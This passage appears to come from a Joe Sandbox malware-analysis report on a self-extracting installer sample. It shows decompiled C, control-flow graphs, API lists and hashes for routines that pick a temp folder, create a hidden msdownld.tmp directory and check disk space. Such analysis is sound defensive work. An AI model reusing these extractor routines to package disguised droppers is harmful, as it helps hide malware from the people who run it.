                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D51E571A00214BBDF249B64DC49FFB7B6CEF55700F0401AAFA49E7191DB719D898AA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001955A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 232 1955a0-1955d9 call 19468f LocalAlloc 235 1955db-1955f1 call 1944b9 call 196285 232->235 236 1955fd-19560c call 19468f 232->236 250 1955f6-1955f8 235->250 242 19560e-195630 call 1944b9 LocalFree 236->242 243 195632-195643 lstrcmpA 236->243 242->250 246 19564b-195659 LocalFree 243->246 247 195645 243->247 248 19565b-19565d 246->248 249 195696-19569c 246->249 247->246 252 195669 248->252 253 19565f-195667 248->253 255 19589f-1958b5 call 196517 249->255 256 1956a2-1956a8 249->256 254 1958b7-1958c7 call 196ce0 250->254 257 19566b-19567a call 195467 252->257 253->252 253->257 255->254 256->255 260 1956ae-1956c1 GetTempPathA 256->260 269 19589b-19589d 257->269 270 195680-195691 call 1944b9 257->270 264 1956f3-195711 call 191781 260->264 265 1956c3-1956c9 call 195467 260->265 275 19586c-195890 GetWindowsDirectoryA call 19597d 264->275 276 195717-195729 GetDriveTypeA 264->276 272 1956ce-1956d0 265->272 269->254 270->250 272->269 273 1956d6-1956df call 192630 272->273 273->264 286 1956e1-1956ed call 195467 273->286 275->264 287 195896 275->287 280 19572b-19572e 276->280 281 195730-195740 GetFileAttributesA 276->281 280->281 284 195742-195745 280->284 281->284 285 19577e-19578f call 19597d 281->285 289 19576b 284->289 290 195747-19574f 284->290 297 195791-19579e call 192630 285->297 298 1957b2-1957bf call 192630 285->298 286->264 286->269 287->269 292 195771-195779 289->292 290->292 294 195751-195753 290->294 296 195864-195866 292->296 294->292 299 195755-195762 call 196952 294->299 296->275 296->276 297->289 309 1957a0-1957b0 call 19597d 297->309 306 1957c1-1957cd GetWindowsDirectoryA 298->306 307 1957d3-1957f8 call 19658a GetFileAttributesA 298->307 299->289 308 195764-195769 299->308 306->307 314 19580a 307->314 315 1957fa-195808 CreateDirectoryA 307->315 308->285 308->289 309->289 309->298 316 19580d-19580f 314->316 315->316 317 195811-195825 316->317 318 195827-19585c SetFileAttributesA call 191781 call 195467 316->318 317->296 318->269 323 19585e 318->323 323->296
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E001955A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x198004; // 0x21bd9a3c
				_v8 = _t28 ^ _t110;
				_t2 = E0019468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0019468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x199a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x198b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x198a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00196517(_t82, 0x7d2, 0, E00193210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x199a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x1991e4;
									_t40 = GetTempPathA(0x104, 0x1991e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00191781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00196952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0019597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00192630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0019658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x1991e4;
																					E00191781(0x1991e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00195467(0x1991e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00192630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0019597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00195467(0x1991e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x1991e4;
											_t70 = E00192630(0, 0x1991e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x1991e4;
												_t71 = E00195467(0x1991e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0019597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x198b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00195467(0x198b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E001944B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x199124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E001944B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x199124 = E00196285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00196CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                                                    0x001955ab
                                                                                                                                                                                                                                    0x001955b2
                                                                                                                                                                                                                                    0x001955c9
                                                                                                                                                                                                                                    0x001955d5
                                                                                                                                                                                                                                    0x001955d9
                                                                                                                                                                                                                                    0x00195600
                                                                                                                                                                                                                                    0x00195605
                                                                                                                                                                                                                                    0x0019560a
                                                                                                                                                                                                                                    0x0019560c
                                                                                                                                                                                                                                    0x00195638
                                                                                                                                                                                                                                    0x00195641
                                                                                                                                                                                                                                    0x00195643
                                                                                                                                                                                                                                    0x00195645
                                                                                                                                                                                                                                    0x00195645
                                                                                                                                                                                                                                    0x0019564c
                                                                                                                                                                                                                                    0x00195652
                                                                                                                                                                                                                                    0x00195657
                                                                                                                                                                                                                                    0x00195659
                                                                                                                                                                                                                                    0x00195696
                                                                                                                                                                                                                                    0x0019569c
                                                                                                                                                                                                                                    0x0019589f
                                                                                                                                                                                                                                    0x001958a7
                                                                                                                                                                                                                                    0x001958ac
                                                                                                                                                                                                                                    0x001958b3
                                                                                                                                                                                                                                    0x001958b5
                                                                                                                                                                                                                                    0x001956a2
                                                                                                                                                                                                                                    0x001956a2
                                                                                                                                                                                                                                    0x001956a8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001956ae
                                                                                                                                                                                                                                    0x001956ae
                                                                                                                                                                                                                                    0x001956b9
                                                                                                                                                                                                                                    0x001956bf
                                                                                                                                                                                                                                    0x001956c1
                                                                                                                                                                                                                                    0x001956f3
                                                                                                                                                                                                                                    0x001956f3
                                                                                                                                                                                                                                    0x00195705
                                                                                                                                                                                                                                    0x0019570a
                                                                                                                                                                                                                                    0x00195711
                                                                                                                                                                                                                                    0x00195717
                                                                                                                                                                                                                                    0x00195724
                                                                                                                                                                                                                                    0x00195726
                                                                                                                                                                                                                                    0x00195729
                                                                                                                                                                                                                                    0x00195730
                                                                                                                                                                                                                                    0x00195737
                                                                                                                                                                                                                                    0x0019573d
                                                                                                                                                                                                                                    0x00195740
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019572b
                                                                                                                                                                                                                                    0x0019572b
                                                                                                                                                                                                                                    0x0019572e
                                                                                                                                                                                                                                    0x00195742
                                                                                                                                                                                                                                    0x00195742
                                                                                                                                                                                                                                    0x00195745
                                                                                                                                                                                                                                    0x0019576b
                                                                                                                                                                                                                                    0x0019576b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195747
                                                                                                                                                                                                                                    0x00195747
                                                                                                                                                                                                                                    0x0019574d
                                                                                                                                                                                                                                    0x0019574f
                                                                                                                                                                                                                                    0x00195771
                                                                                                                                                                                                                                    0x00195771
                                                                                                                                                                                                                                    0x00195773
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195751
                                                                                                                                                                                                                                    0x00195751
                                                                                                                                                                                                                                    0x00195753
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195755
                                                                                                                                                                                                                                    0x0019575b
                                                                                                                                                                                                                                    0x00195760
                                                                                                                                                                                                                                    0x00195762
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195764
                                                                                                                                                                                                                                    0x00195764
                                                                                                                                                                                                                                    0x00195769
                                                                                                                                                                                                                                    0x0019577e
                                                                                                                                                                                                                                    0x0019577e
                                                                                                                                                                                                                                    0x00195781
                                                                                                                                                                                                                                    0x00195788
                                                                                                                                                                                                                                    0x0019578d
                                                                                                                                                                                                                                    0x0019578f
                                                                                                                                                                                                                                    0x001957b2
                                                                                                                                                                                                                                    0x001957b8
                                                                                                                                                                                                                                    0x001957bd
                                                                                                                                                                                                                                    0x001957bf
                                                                                                                                                                                                                                    0x001957cd
                                                                                                                                                                                                                                    0x001957cd
                                                                                                                                                                                                                                    0x001957dd
                                                                                                                                                                                                                                    0x001957e3
                                                                                                                                                                                                                                    0x001957ef
                                                                                                                                                                                                                                    0x001957f5
                                                                                                                                                                                                                                    0x001957f8
                                                                                                                                                                                                                                    0x0019580a
                                                                                                                                                                                                                                    0x0019580a
                                                                                                                                                                                                                                    0x001957fa
                                                                                                                                                                                                                                    0x00195802
                                                                                                                                                                                                                                    0x00195802
                                                                                                                                                                                                                                    0x0019580d
                                                                                                                                                                                                                                    0x0019580f
                                                                                                                                                                                                                                    0x00195830
                                                                                                                                                                                                                                    0x00195836
                                                                                                                                                                                                                                    0x0019583d
                                                                                                                                                                                                                                    0x0019584b
                                                                                                                                                                                                                                    0x00195851
                                                                                                                                                                                                                                    0x00195855
                                                                                                                                                                                                                                    0x0019585a
                                                                                                                                                                                                                                    0x0019585c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019585e
                                                                                                                                                                                                                                    0x0019585e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019585e
                                                                                                                                                                                                                                    0x00195811
                                                                                                                                                                                                                                    0x00195817
                                                                                                                                                                                                                                    0x00195819
                                                                                                                                                                                                                                    0x0019581f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019581f
                                                                                                                                                                                                                                    0x00195791
                                                                                                                                                                                                                                    0x00195797
                                                                                                                                                                                                                                    0x0019579c
                                                                                                                                                                                                                                    0x0019579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001957a0
                                                                                                                                                                                                                                    0x001957a9
                                                                                                                                                                                                                                    0x001957ae
                                                                                                                                                                                                                                    0x001957b0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001957b0
                                                                                                                                                                                                                                    0x0019579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195769
                                                                                                                                                                                                                                    0x00195762
                                                                                                                                                                                                                                    0x00195753
                                                                                                                                                                                                                                    0x0019574f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019572e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195864
                                                                                                                                                                                                                                    0x00195864
                                                                                                                                                                                                                                    0x00195864
                                                                                                                                                                                                                                    0x00195717
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001956c3
                                                                                                                                                                                                                                    0x001956c5
                                                                                                                                                                                                                                    0x001956c9
                                                                                                                                                                                                                                    0x001956ce
                                                                                                                                                                                                                                    0x001956d0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001956d6
                                                                                                                                                                                                                                    0x001956d6
                                                                                                                                                                                                                                    0x001956d8
                                                                                                                                                                                                                                    0x001956dd
                                                                                                                                                                                                                                    0x001956df
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001956e1
                                                                                                                                                                                                                                    0x001956e2
                                                                                                                                                                                                                                    0x001956e4
                                                                                                                                                                                                                                    0x001956e6
                                                                                                                                                                                                                                    0x001956eb
                                                                                                                                                                                                                                    0x001956ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001956f3
                                                                                                                                                                                                                                    0x001956f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019586c
                                                                                                                                                                                                                                    0x00195878
                                                                                                                                                                                                                                    0x0019587e
                                                                                                                                                                                                                                    0x00195882
                                                                                                                                                                                                                                    0x00195883
                                                                                                                                                                                                                                    0x00195889
                                                                                                                                                                                                                                    0x0019588e
                                                                                                                                                                                                                                    0x0019588e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195896
                                                                                                                                                                                                                                    0x001956ed
                                                                                                                                                                                                                                    0x001956df
                                                                                                                                                                                                                                    0x001956d0
                                                                                                                                                                                                                                    0x001956c1
                                                                                                                                                                                                                                    0x001956a8
                                                                                                                                                                                                                                    0x0019565b
                                                                                                                                                                                                                                    0x0019565b
                                                                                                                                                                                                                                    0x0019565d
                                                                                                                                                                                                                                    0x00195669
                                                                                                                                                                                                                                    0x00195669
                                                                                                                                                                                                                                    0x0019565f
                                                                                                                                                                                                                                    0x0019565f
                                                                                                                                                                                                                                    0x00195665
                                                                                                                                                                                                                                    0x00195667
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195667
                                                                                                                                                                                                                                    0x0019566c
                                                                                                                                                                                                                                    0x00195673
                                                                                                                                                                                                                                    0x00195678
                                                                                                                                                                                                                                    0x0019567a
                                                                                                                                                                                                                                    0x0019589b
                                                                                                                                                                                                                                    0x0019589b
                                                                                                                                                                                                                                    0x00195680
                                                                                                                                                                                                                                    0x00195685
                                                                                                                                                                                                                                    0x0019568c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019568c
                                                                                                                                                                                                                                    0x0019567a
                                                                                                                                                                                                                                    0x0019560e
                                                                                                                                                                                                                                    0x00195613
                                                                                                                                                                                                                                    0x0019561a
                                                                                                                                                                                                                                    0x00195620
                                                                                                                                                                                                                                    0x00195626
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195626
                                                                                                                                                                                                                                    0x001955db
                                                                                                                                                                                                                                    0x001955e0
                                                                                                                                                                                                                                    0x001955e7
                                                                                                                                                                                                                                    0x001955f1
                                                                                                                                                                                                                                    0x001955f6
                                                                                                                                                                                                                                    0x001955f6
                                                                                                                                                                                                                                    0x001955f6
                                                                                                                                                                                                                                    0x001958b7
                                                                                                                                                                                                                                    0x001958c7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001955CF
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00195638
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0019564C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00195620
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                      • Part of subcall function 00196285: GetLastError.KERNEL32(00195BBC), ref: 00196285
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 001956B9
                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0019571E
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00195737
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001957CD
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001957EF
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00195802
                                                                                                                                                                                                                                      • Part of subcall function 00192630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00192654
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00195830
                                                                                                                                                                                                                                      • Part of subcall function 00196517: FindResourceA.KERNEL32(00190000,000007D6,00000005), ref: 0019652A
                                                                                                                                                                                                                                      • Part of subcall function 00196517: LoadResource.KERNEL32(00190000,00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00196538
                                                                                                                                                                                                                                      • Part of subcall function 00196517: DialogBoxIndirectParamA.USER32(00190000,00000000,00000547,001919E0,00000000), ref: 00196557
                                                                                                                                                                                                                                      • Part of subcall function 00196517: FreeResource.KERNEL32(00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00196560
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00195878
                                                                                                                                                                                                                                      • Part of subcall function 0019597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001959A8
                                                                                                                                                                                                                                      • Part of subcall function 0019597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001959AF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                    • API String ID: 2436801531-752058184
                                                                                                                                                                                                                                    • Opcode ID: d69c2889e7f3e43b98f3b81d93308ec766bf21489c1b48252856ffa3a6bd650c
                                                                                                                                                                                                                                    • Instruction ID: 6c60e96828fc020201c5873c2a505fcafeaef186876948db4665b28799e534a0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d69c2889e7f3e43b98f3b81d93308ec766bf21489c1b48252856ffa3a6bd650c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5814E70A04A05ABDF26AB759C45BFE766F9F60340F440066F986F3191EF708EC58B61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0019597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 324 19597d-1959b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1959bb-1959d8 call 1944b9 call 196285 324->325 326 1959dd-195a1b GetDiskFreeSpaceA 324->326 345 195c05-195c14 call 196ce0 325->345 328 195ba1-195bde memset call 196285 GetLastError FormatMessageA 326->328 329 195a21-195a4a MulDiv 326->329 339 195be3-195bfc call 1944b9 SetCurrentDirectoryA 328->339 329->328 332 195a50-195a6c GetVolumeInformationA 329->332 335 195a6e-195ab0 memset call 196285 GetLastError FormatMessageA 332->335 336 195ab5-195aca SetCurrentDirectoryA 332->336 335->339 337 195acc-195ad1 336->337 343 195ad3-195ad8 337->343 344 195ae2-195ae4 337->344 351 195c02 339->351 343->344 347 195ada-195ae0 343->347 349 195ae7-195af8 344->349 350 195ae6 344->350 347->337 347->344 353 195af9-195afb 349->353 350->349 354 195c04 351->354 355 195afd-195b03 353->355 356 195b05-195b08 353->356 354->345 355->353 355->356 357 195b0a-195b1b call 1944b9 356->357 358 195b20-195b27 356->358 357->351 360 195b29-195b33 358->360 361 195b52-195b5b 358->361 360->361 362 195b35-195b50 360->362 363 195b62-195b6d 361->363 362->363 365 195b6f-195b74 363->365 366 195b76-195b7d 363->366 367 195b85 365->367 368 195b7f-195b81 366->368 369 195b83 366->369 370 195b87-195b94 call 19268b 367->370 371 195b96-195b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                    			E0019597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x198004; // 0x21bd9a3c
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x199124 = E00196285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E001944B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x199a34 & 0x00000008;
							if(( *0x199a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x199a38; // 0x0
								_t110 =  *((intOrPtr*)(0x1989e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
